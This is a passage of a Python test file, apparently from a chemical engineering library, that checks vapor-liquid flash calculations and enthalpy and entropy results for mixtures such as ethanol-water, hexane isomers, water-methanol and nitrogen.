assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
# Same flash with T-VF spec
phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs)
assert phase == 'l/g'
assert_allclose(xs, xs_expect)
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
# Same flash with P-VF spec
phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs)
assert phase == 'l/g'
assert_allclose(xs, xs_expect)
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
# Test the flash interface directly
T_known = m.T
V_over_F_known = V_over_F_expect
zs = m.zs
vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
P_known = vodka.P
xs_known = vodka.xs
ys_known = vodka.ys
phase_known = vodka.phase
# test TP flash gives the same as TVF
vodka.flash(T=T_known, P=P_known, zs=zs)
assert_allclose(V_over_F_known, vodka.V_over_F)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert vodka.phase == phase_known
# Test PVF flash gives same as well
vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert_allclose(xs_known, vodka.xs)
assert_allclose(T_known, vodka.T)
assert vodka.phase == phase_known
with pytest.raises(Exception):
vodka.plot_ternary(T=300)
# Test Tdew, Tbubble, Pbubble, Pdew
T = 298.15
Pdew = vodka.Pdew(298.15, [0.5, 0.5])
T_recalc = vodka.Tdew(Pdew, [0.5, 0.5])
assert_allclose(T_recalc, T)
assert_allclose(Pdew, 4517, rtol=2E-3)
T2 = 294.7556209619327
Pbubble = vodka.Pbubble(T2, [0.5, 0.5])
assert_allclose(Pbubble, 4517, rtol=2E-3)
T2_recalc = vodka.Tbubble(4517.277960030594, [0.5, 0.5])
assert_allclose(T2_recalc, T2)
vodka.flash(P=5000, VF=0, zs=[1, 0])
vodka.flash(P=5000, VF=0, zs=[1, 0])
vodka.flash(P=5000, VF=1, zs=[0, 1])
vodka.flash(P=5000, VF=1, zs=[0, 1])
@pytest.mark.deprecated
def test_Ideal_composition_zeros():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
# Test zero composition components - Pressure
vodka.flash(P=5000, VF=0, zs=[1, 0])
P = .1
for k in range(0, 7):
P *= 10
for VF in (0, 0.3, 1):
for zs in ([1, 0], [0, 1]):
vodka.flash(P=P, VF=VF, zs=zs)
# Test zero composition components - Temperature
for VF in (0, 0.3, 1):
for zs in ([1, 0], [0, 1]):
vodka.flash(T=300, VF=VF, zs=zs)
@pytest.mark.deprecated
def test_Ideal_single_component():
m = Mixture(['water'], zs=[1], T=298.15)
test_pkg = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
# T and P with TP flash
phase, xs, ys, V_over_F = test_pkg.flash_TP_zs(m.T, m.VaporPressures[0](298.15), m.zs)
V_over_F_expect = 1
xs_expect = None
ys_expect = [1]
assert phase == 'g'
assert xs == None
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
phase, xs, ys, V_over_F = test_pkg.flash_TP_zs(m.T, m.VaporPressures[0](298.15)+1E-10, m.zs)
V_over_F_expect = 0
xs_expect = [1]
ys_expect = None
assert phase == 'l'
assert ys == None
assert_allclose(xs, xs_expect)
assert_allclose(V_over_F, V_over_F_expect)
# TVF
phase, xs, ys, V_over_F, P = test_pkg.flash_TVF_zs(m.T, 1, m.zs)
V_over_F_expect = 1
xs_expect = [1]
ys_expect = [1]
assert phase == 'l/g'
assert xs == xs_expect
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(P, 3167.418523735963, rtol=1E-3)
phase, xs, ys, V_over_F, P = test_pkg.flash_TVF_zs(m.T, 0, m.zs)
V_over_F_expect = 0
xs_expect = [1]
ys_expect = [1]
assert phase == 'l/g'
assert xs == xs_expect
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(V_over_F, V_over_F_expect)
# PVF
phase, xs, ys, V_over_F, T = test_pkg.flash_PVF_zs(3167, 1, m.zs)
V_over_F_expect = 1
xs_expect = [1]
ys_expect = [1]
assert phase == 'l/g'
assert xs == xs_expect
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(T, 298.1477829296143, rtol=1E-3)
phase, xs, ys, V_over_F, T = test_pkg.flash_PVF_zs(3167, 0, m.zs)
V_over_F_expect = 0
xs_expect = [1]
ys_expect = [1]
assert phase == 'l/g'
assert xs == xs_expect
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(V_over_F, V_over_F_expect)
assert_allclose(T, 298.1477829296143, rtol=1E-3)
#import matplotlib.pyplot as plt
#@pytest.mark.mpl_image_compare
#def test_Ideal_matplotlib():
# m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
# vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
# return vodka.plot_Pxy(T=300, pts=30, display=False)
@pytest.mark.slow
@pytest.mark.deprecated
def test_IdealPP_fuzz_TP_VF():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
for i in range(500):
# May fail right now on the transition between vapor pressure
# function boundaries; there are multiple solutions for that case
# Especially near T = 513.9263246740085 or T = 273.15728497179936
# Failure is only for PVF flashes
# There may also be failures for extrapolated vapor pressures, but
# those are not tested for here.
zs = [uniform(0, 1) for i in range(2)]
zs = [i/sum(zs) for i in zs]
T_known = uniform(200, 513)
V_over_F_known = uniform(0, 1)
if 273.14 < T_known < 274.15 or 513.85 < T_known < 514.:
continue
vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
P_known = vodka.P
xs_known = vodka.xs
ys_known = vodka.ys
phase_known = vodka.phase
# test TP flash gives the same as TVF
vodka.flash(T=T_known, P=P_known, zs=zs)
assert_allclose(V_over_F_known, vodka.V_over_F)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert vodka.phase == phase_known
# Test PVF flash gives same as well
vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert_allclose(xs_known, vodka.xs)
assert_allclose(T_known, vodka.T)
assert vodka.phase == phase_known
names = ['hexane', '2-methylpentane', '3-methylpentane', '2,3-dimethylbutane', '2,2-dimethylbutane']
m = Mixture(names, zs=[.2, .2, .2, .2, .2], P=1E5, T=300)
test_pkg = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
for i in range(500):
zs = [uniform(0, 1) for i in range(5)]
zs = [i/sum(zs) for i in zs]
T_known = uniform(200, 488.0)
V_over_F_known = uniform(0, 1)
test_pkg.flash(T=T_known, VF=V_over_F_known, zs=zs)
P_known = test_pkg.P
xs_known = test_pkg.xs
ys_known = test_pkg.ys
phase_known = test_pkg.phase
# test TP flash gives the same as TVF
test_pkg.flash(T=T_known, P=P_known, zs=zs)
assert_allclose(V_over_F_known, test_pkg.V_over_F)
assert_allclose(xs_known, test_pkg.xs)
assert_allclose(ys_known, test_pkg.ys)
assert test_pkg.phase == phase_known
# Test PVF flash gives same as well
test_pkg.flash(VF=V_over_F_known, P=P_known, zs=zs)
assert_allclose(xs_known, test_pkg.xs)
assert_allclose(ys_known, test_pkg.ys)
assert_allclose(xs_known, test_pkg.xs)
assert_allclose(T_known, test_pkg.T)
assert test_pkg.phase == phase_known
@pytest.mark.slow
@pytest.mark.deprecated
def test_Unifac():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=6500, T=298.15)
vodka = Unifac(m.UNIFAC_groups, m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
# Low pressure ethanol-water ideal TP flash
phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs)
V_over_F_expect = 0.7522885045317019
xs_expect = [0.2761473052710751, 0.7238526947289249]
ys_expect = [0.5737096013588943, 0.42629039864110585]
assert phase == 'l/g'
assert_allclose(xs, xs_expect)
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
# Same flash with T-VF spec
phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs)
assert phase == 'l/g'
assert_allclose(xs, xs_expect, rtol=1E-5)
assert_allclose(ys, ys_expect, rtol=1E-5)
assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
# Same flash with P-VF spec
phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs)
assert phase == 'l/g'
assert_allclose(xs, xs_expect, rtol=1E-5)
assert_allclose(ys, ys_expect, rtol=1E-5)
assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
# Test the flash interface directly
T_known = m.T
V_over_F_known = V_over_F_expect
zs = m.zs
vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
P_known = vodka.P
xs_known = vodka.xs
ys_known = vodka.ys
phase_known = vodka.phase
# test TP flash gives the same as TVF
vodka.flash(T=T_known, P=P_known, zs=zs)
assert_allclose(V_over_F_known, vodka.V_over_F)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert vodka.phase == phase_known
# Test PVF flash gives same as well
vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert_allclose(xs_known, vodka.xs)
assert_allclose(T_known, vodka.T)
assert vodka.phase == phase_known
@pytest.mark.deprecated
def test_NRTL_package():
m = Mixture(['water', 'ethanol'], zs=[1-.252, .252], T=273.15+70)
# 6 coeggicients per row.
# Sample parameters from Understanding Distillation Using Column Profile Maps, First Edition.
# Daniel Beneke, Mark Peters, David Glasser, and Diane Hildebrandt.
# Nice random example except for the poor prediction ! Dew point is good
# But the bubble point is 10 kPa too high.
# Still it is a good test of asymmetric values and the required
# input form.
taus = [
[[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]],
[[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]]
]
alphas = [[[0.0, 0.0], [0.0, 0.0]],
[[0.3, 0], [0.0, 0.0]] ]
pp = Nrtl(tau_coeffs=taus, alpha_coeffs=alphas, VaporPressures=m.VaporPressures, Tms=m.Tms,
Tcs=m.Tcs, Pcs=m.Pcs, omegas=m.omegas, VolumeLiquids=m.VolumeLiquids,
HeatCapacityLiquids=m.HeatCapacityLiquids,
HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations)
assert_allclose(pp.gammas(T=m.T, xs=m.zs), [1.1114056946393671, 2.5391220022675163], rtol=1e-6)
assert_allclose(pp.alphas(m.T), [[0.0, 0.0], [0.3, 0.0]])
assert_allclose(pp.taus(m.T), [[0.0, 1.7500005828354948], [-0.08352950604691833, 0.0]])
pp.flash(T=m.T, VF=0, zs=m.zs)
assert_allclose(pp.P, 72190.62175687613, rtol=2e-3)
pp.flash(T=m.T, VF=1, zs=m.zs)
assert_allclose(pp.P, 40485.10473289466, rtol=2e-3)
@pytest.mark.deprecated
def test_NRTL_package_constants():
taus = [ [[0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [3.458, -586.1, 0, 0, 0, 0]],
[[-0.801, 246.2, 0, 0, 0, 0], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0]] ]
alphas = [[[0.0, 0.0], [0.0, 0.0]],
[[0.3, 0], [0.0, 0.0]] ]
IDs = ['water', 'ethanol']
# tau_coeffs, alpha_coeffs
zs = [1-.252, .252]
pkg = PropertyPackageConstants(IDs, name=NRTL_PKG, tau_coeffs=taus, alpha_coeffs=alphas)
pkg.pkg.flash(zs=zs, T=300, VF=0.5)
pkg.pkg.phase, pkg.pkg.P
assert_allclose(pkg.pkg.P, 5763.42373196148, atol=20, rtol=1e-4)
@pytest.mark.deprecated
def test_Unifac_EOS_POY():
m = Mixture(['pentane', 'hexane', 'octane'], zs=[.1, .4, .5], T=298.15)
pkg = Unifac(UNIFAC_groups=m.UNIFAC_groups, VaporPressures=m.VaporPressures, Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs,
omegas=m.omegas, VolumeLiquids=m.VolumeLiquids, eos=PR, eos_mix=PRMIX)
pkg.use_phis, pkg.use_Poynting = True, True
pkg.flash(zs=m.zs, T=400, VF=0.5)
xs_expect = [0.04428613261665119, 0.28125472768746834, 0.6744591396958806]
ys_expect = [0.15571386738334897, 0.518745272312532, 0.32554086030411905]
assert pkg.phase == 'l/g'
assert_allclose(pkg.xs, xs_expect, rtol=1e-3)
assert_allclose(pkg.ys, ys_expect, rtol=1e-3)
assert_allclose(pkg.P, 230201.5387679756, rtol=1e-3)
@pytest.mark.fuzz
@pytest.mark.slow
@pytest.mark.deprecated
def test_Unifac_fuzz():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
vodka = Unifac(m.UNIFAC_groups, m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
for i in range(500):
zs = [uniform(0, 1) for i in range(2)]
zs = [i/sum(zs) for i in zs]
T_known = uniform(274, 513)
V_over_F_known = uniform(0, 1)
vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
P_known = vodka.P
xs_known = vodka.xs
ys_known = vodka.ys
phase_known = vodka.phase
# test TP flash gives the same as TVF
vodka.flash(T=T_known, P=P_known, zs=zs)
assert_allclose(V_over_F_known, vodka.V_over_F, rtol=1E-5)
assert_allclose(xs_known, vodka.xs, rtol=1E-5)
assert_allclose(ys_known, vodka.ys, rtol=1E-5)
assert vodka.phase == phase_known
# Test PVF flash gives same as well
vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert_allclose(xs_known, vodka.xs)
assert_allclose(T_known, vodka.T)
assert vodka.phase == phase_known
@pytest.mark.slow
@pytest.mark.deprecated
def test_UnifacDortmund():
m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=6500, T=298.15)
vodka = UnifacDortmund(UNIFAC_groups=m.UNIFAC_Dortmund_groups, VaporPressures=m.VaporPressures,
Tms=m.Tms, Tcs=m.Tcs, Pcs=m.Pcs)
# Low pressure ethanol-water ideal TP flash
phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs)
V_over_F_expect = 0.721802969194136
xs_expect = [0.26331608196660095, 0.736683918033399]
ys_expect = [0.5912226272910779, 0.408777372708922]
assert phase == 'l/g'
assert_allclose(xs, xs_expect)
assert_allclose(ys, ys_expect)
assert_allclose(V_over_F, V_over_F_expect)
# Same flash with T-VF spec
phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs)
assert phase == 'l/g'
assert_allclose(xs, xs_expect, rtol=1E-5)
assert_allclose(ys, ys_expect, rtol=1E-5)
assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
# Same flash with P-VF spec
phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs)
assert phase == 'l/g'
assert_allclose(xs, xs_expect, rtol=1E-5)
assert_allclose(ys, ys_expect, rtol=1E-5)
assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
# Test the flash interface directly
T_known = m.T
V_over_F_known = V_over_F_expect
zs = m.zs
vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
P_known = vodka.P
xs_known = vodka.xs
ys_known = vodka.ys
phase_known = vodka.phase
# test TP flash gives the same as TVF
vodka.flash(T=T_known, P=P_known, zs=zs)
assert_allclose(V_over_F_known, vodka.V_over_F)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert vodka.phase == phase_known
# Test PVF flash gives same as well
vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
assert_allclose(xs_known, vodka.xs)
assert_allclose(ys_known, vodka.ys)
assert_allclose(xs_known, vodka.xs)
assert_allclose(T_known, vodka.T)
assert vodka.phase == phase_known
@pytest.mark.deprecated
def test_plotting_failures():
m = Mixture(['ethanol', 'methanol', 'water'], zs=[0.3, 0.3, 0.4], P=5000, T=298.15)
ternary = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
with pytest.raises(Exception):
ternary.plot_Pxy(300)
with pytest.raises(Exception):
ternary.plot_Txy(300)
with pytest.raises(Exception):
ternary.plot_xy(300)
@pytest.mark.deprecated
def test_IdealCaloric_single_component_H():
w = Chemical('water')
EnthalpyVaporization = w.EnthalpyVaporization
HeatCapacityGas = w.HeatCapacityGas
VaporPressure = w.VaporPressure
m = Mixture(['water'], zs=[1], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
pkg.P_DEPENDENT_H_LIQ = False
# Check the enthalpy of vaporization matches at the reference temperature
pkg.flash(T=298.15, P=1E5, zs=m.zs)
H_pp = pkg.enthalpy_Cpg_Hvap()
assert_allclose(H_pp, -EnthalpyVaporization(298.15))
# Check it's pressure independent for the gas (at ref T)
kw_options = [{'P': w.Psat}, {'P': 100}, {'P': 1E-10}, {'VF': 1}]
for kw in kw_options:
pkg.flash(T=298.15, zs=m.zs, **kw)
H_pp = pkg.enthalpy_Cpg_Hvap()
assert_allclose(H_pp, 0)
# Check it's pressure is independent (so long as it stays liquid)
kw_options = [{'P': w.Psat+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}]
for kw in kw_options:
pkg.flash(T=298.15, zs=m.zs, **kw)
H_pp = pkg.enthalpy_Cpg_Hvap()
assert_allclose(H_pp, -EnthalpyVaporization(298.15))
# Gas heat capacity along the vapor curve (and above it)
for T in np.linspace(w.Tm, w.Tc-1):
for kw in [{'VF': 1}, {'P': VaporPressure(T)*0.5}]:
pkg.flash(T=T, zs=m.zs, **kw)
H_pp = pkg.enthalpy_Cpg_Hvap()
assert_allclose(H_pp, HeatCapacityGas.T_dependent_property_integral(298.15, T))
# Gas heat capacity plus enthalpy of vaporization along the liquid
for T in np.linspace(w.Tm, w.Tc-1):
for kw in [{'VF': 0}, {'P': VaporPressure(T)*1.1}]:
pkg.flash(T=T, zs=m.zs, **kw)
H_pp = pkg.enthalpy_Cpg_Hvap()
H_recalc = (HeatCapacityGas.T_dependent_property_integral(298.15, T)
-EnthalpyVaporization(T))
assert_allclose(H_pp, H_recalc)
# Just one basic case at VF = 0.5
T = 298.15
pkg.flash(T=T, zs=m.zs, VF=0.5)
assert_allclose(pkg.enthalpy_Cpg_Hvap(), -0.5*EnthalpyVaporization(T))
# For a variety of vapor fractions and temperatures, check the enthapy is correctly described
for VF in np.linspace(0., 1, 20):
for T in np.linspace(w.Tm, w.Tc, 5):
pkg.flash(T=T, zs=m.zs, VF=VF)
pkg_calc = pkg.enthalpy_Cpg_Hvap()
hand_calc = -(1 - VF)*EnthalpyVaporization(T) + HeatCapacityGas.T_dependent_property_integral(298.15, T)
assert_allclose(pkg_calc, hand_calc)
# Check the liquid and vapor enthalpies are equal at the critical point
T = w.Tc
pkg.flash(T=w.Tc, zs=m.zs, VF=1)
Hvap_Tc_1 = pkg.enthalpy_Cpg_Hvap()
pkg.flash(T=w.Tc, zs=m.zs, VF=0)
Hvap_Tc_0 = pkg.enthalpy_Cpg_Hvap()
assert_allclose(Hvap_Tc_0, Hvap_Tc_1)
pkg.flash(T=w.Tc, zs=m.zs, VF=0.5)
Hvap_Tc_half = pkg.enthalpy_Cpg_Hvap()
assert_allclose(Hvap_Tc_0, Hvap_Tc_half)
@pytest.mark.deprecated
def test_IdealCaloric_binary_H():
m = Mixture(['water', 'ethanol'], zs=[0.3, 0.7], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
pkg.P_DEPENDENT_H_LIQ = False
# Check the enthalpy of vaporization matches at the reference temperature (as a liquid)
pkg.flash(T=298.15, P=1E5, zs=m.zs)
H_pp = pkg.enthalpy_Cpg_Hvap()
assert_allclose(H_pp, (-0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15)))
# Check the enthalpy of 0 matches at the reference temperature (as a gas)
pkg.flash(T=298.15, VF=1, zs=m.zs)
assert_allclose(0, pkg.enthalpy_Cpg_Hvap(), atol=1E-9)
# Check the gas, at various pressure but still Tref, has enthalpy of 0
pkg.flash(T=298.15, zs=m.zs, VF=1)
P_dew = pkg.P
kw_options = [{'P': P_dew}, {'P': 100}, {'P': 1E-10}, {'VF': 1}]
for kw in kw_options:
pkg.flash(T=298.15, zs=m.zs, **kw)
H_pp = pkg.enthalpy_Cpg_Hvap()
assert_allclose(H_pp, 0, atol=1E-7)
# Check it's pressure is independent (so long as it stays liquid), has enthalpy of 0
pkg.flash(T=298.15, zs=m.zs, VF=0)
P_bubble = pkg.P
kw_options = [{'P': P_bubble+1E-4}, {'P': 1E4}, {'P': 1E10}, {'VF': 0}]
for kw in kw_options:
pkg.flash(T=298.15, zs=m.zs, **kw)
H_pp = pkg.enthalpy_Cpg_Hvap()
H_handcalc = -0.3*m.EnthalpyVaporizations[0](298.15) -0.7*m.EnthalpyVaporizations[1](298.15)
assert_allclose(H_pp, H_handcalc)
# For a variety of vapor fractions and temperatures, check the enthapy is correctly described
for VF in np.linspace(0., 1, 6):
for T in np.linspace(280, 400, 8):
z1 = uniform(0, 1)
z2 = 1-z1
zs = [z1, z2]
pkg.flash(T=T, zs=zs, VF=VF)
pkg_calc = pkg.enthalpy_Cpg_Hvap()
# bad hack as the behavior changed after
if pkg.xs == None:
pkg.xs = pkg.zs
hand_calc =(-(1 - VF)*(pkg.xs[0]*m.EnthalpyVaporizations[0](T) + pkg.xs[1]*m.EnthalpyVaporizations[1](T))
+ (z1*m.HeatCapacityGases[0].T_dependent_property_integral(298.15, T) + z2*m.HeatCapacityGases[1].T_dependent_property_integral(298.15, T)))
assert_allclose(pkg_calc, hand_calc)
@pytest.mark.deprecated
def test_IdealCaloric_nitrogen_S():
m = Mixture(['nitrogen'], zs=[1], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
# Check the enthalpy of vaporization matches at the reference temperature for a gas
pkg.flash(T=298.15, P=101325, zs=m.zs)
S_pp = pkg.entropy_Cpg_Hvap()
assert_allclose(S_pp, 0, atol=1E-9)
# Check a entropy difference vs coolprop (N2)- 1.5% error
pkg.flash(T=298.15, P=101325, zs=m.zs)
S1 = pkg.entropy_Cpg_Hvap()
pkg.flash(T=298.15, P=2000325, zs=m.zs)
S2 = pkg.entropy_Cpg_Hvap()
assert_allclose(S2-S1, -25.16418, rtol=0.015) #
# Check a entropy difference vs coolprop (N2)- 0.3% error
pkg.flash(T=298.15, P=101325, zs=m.zs)
S1 = pkg.entropy_Cpg_Hvap()
pkg.flash(T=298.15, P=102325, zs=m.zs)
S2 = pkg.entropy_Cpg_Hvap()
# 0.3% error with 1 kPa difference
assert_allclose(S2-S1, -0.08184949145277187, rtol=0.003) # PropsSI('SMOLAR', 'T', 298.15, 'P', 102325, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2')
# S2-S1
# <2.5% error on a 10 MPa/500K N2 vs 298.15 and 1 atm vs coolprop
pkg.flash(T=298.15, P=101325, zs=m.zs)
S1 = pkg.entropy_Cpg_Hvap()
pkg.flash(T=500, P=1E7, zs=m.zs)
S2 = pkg.entropy_Cpg_Hvap()
assert_allclose(S2-S1, -23.549468174122012, rtol=0.026) # PropsSI('SMOLAR', 'T', 500, 'P', 1E7, 'N2') - PropsSI('SMOLAR', 'T', 298.15, 'P', 101325, 'N2')
# Entropy change of condensation at the saturation point of 1 bar - very low error
pkg.flash(VF=1, P=1E5, zs=m.zs)
S1 = pkg.entropy_Cpg_Hvap()
pkg.flash(VF=0, P=1E5, zs=m.zs)
S2 = pkg.entropy_Cpg_Hvap()
# T_change = PropsSI('T', 'Q', 0, 'P', 1E5, 'N2') # 77.24349973069587
# dS = PropsSI('SMOLAR', 'Q', 0, 'T', T_change, 'N2') - PropsSI('SMOLAR', 'Q', 1, 'T', T_change, 'N2')
assert_allclose(S2 - S1, -72.28618677058911, rtol=5E-4)
# Same test as before, 50% condensed
pkg.flash(VF=1, P=1E5, zs=m.zs)
S1 = pkg.entropy_Cpg_Hvap()
pkg.flash(VF=0.5, P=1E5, zs=m.zs)
S2 = pkg.entropy_Cpg_Hvap()
assert_allclose(S2 - S1, -72.28618677058911/2, rtol=5E-4)
# Test compressing a liquid doesn't add any entropy
pkg.flash(VF=0, P=1E5, zs=m.zs)
S1 = pkg.entropy_Cpg_Hvap()
T = pkg.T
pkg.flash(T=T, P=2E5, zs=m.zs)
S2 = pkg.entropy_Cpg_Hvap()
assert_allclose(S1-S2, 0)
@pytest.mark.deprecated
def test_IdealCaloric_enthalpy_Cpl_Cpg_Hvap_binary_Tc_ref():
w = Chemical('water')
MeOH = Chemical('methanol')
m = Mixture(['water', 'methanol'], zs=[0.3, 0.7], T=298.15)
pkg = IdealCaloric(VaporPressures=m.VaporPressures, Tms=m.Tms, Tbs=m.Tbs, Tcs=m.Tcs, Pcs=m.Pcs,
HeatCapacityLiquids=m.HeatCapacityLiquids, HeatCapacityGases=m.HeatCapacityGases,
EnthalpyVaporizations=m.EnthalpyVaporizations, VolumeLiquids=m.VolumeLiquids)
pkg.set_T_transitions('Tc')
# Liquid change only, but to the phase change barrier
pkg.flash(T=298.15+200, VF=0, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
dH_hand = (0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200)
+0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, 298.15+200))
assert_allclose(dH, dH_hand)
# Flash a minute amount - check the calc still works and the value is the same
pkg.flash(T=298.15+200, VF=1E-7, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
assert_allclose(dH, dH_hand, rtol=1E-6)
# Flash to vapor at methanol's critical point
pkg.flash(T=MeOH.Tc, VF=1, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
dH_hand = (0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tc)
+0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tc)
+ 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tc, MeOH.Tc))
assert_allclose(dH, dH_hand)
# Flash a minute amount more - check the calc still works and the value is the same
pkg.flash(T=MeOH.Tc, P=pkg.P*.9999999, zs=m.zs)
dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
assert_allclose(dH, dH_minute_diff)
# Again
pkg.flash(T=MeOH.Tc, VF=0.99999999, zs=m.zs)
dH_minute_diff = pkg.enthalpy_Cpl_Cpg_Hvap()
assert_allclose(dH, dH_minute_diff)
# Do a test with 65% liquid
T = MeOH.Tc
pkg.flash(T=T, VF=0.35, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
liq_w_dH = pkg.xs[0]*0.65*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
liq_MeOH_dH = pkg.xs[1]*0.65*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, T)
dH_w_vapor = 0.35*pkg.ys[0]*(w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tc)
+ w.HeatCapacityGas.T_dependent_property_integral(w.Tc, T))
dH_MeOH_vapor = 0.35*pkg.ys[1]*(MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15,T)
+ MeOH.HeatCapacityGas.T_dependent_property_integral(T, T))
dH_hand = dH_MeOH_vapor + dH_w_vapor + liq_MeOH_dH + liq_w_dH
assert_allclose(dH, dH_hand)
# Full vapor flash, high T
pkg.flash(T=1200, P=1E7, zs=m.zs)
dH = pkg.enthalpy_Cpl_Cpg_Hvap()
liq_w_dH = 0.3*w.HeatCapacityLiquid.T_dependent_property_integral(298.15, w.Tc)
liq_MeOH_dH = 0.7*MeOH.HeatCapacityLiquid.T_dependent_property_integral(298.15, MeOH.Tc)
dH_w_vapor = 0.3*w.HeatCapacityGas.T_dependent_property_integral(w.Tc, 1200)
dH_MeOH_vapor = 0.7*MeOH.HeatCapacityGas.T_dependent_property_integral(MeOH.Tc, 1200)
dH_hand = liq_w_dH + liq_MeOH_dH + dH_w_vapor + dH_MeOH_vapor
assert_allclose(dH_hand, dH)
@pytest.mark.deprecated
def test_IdealCaloric_enthalpy_Cpl_Cpg_Hvap_binary_Tb_ref():
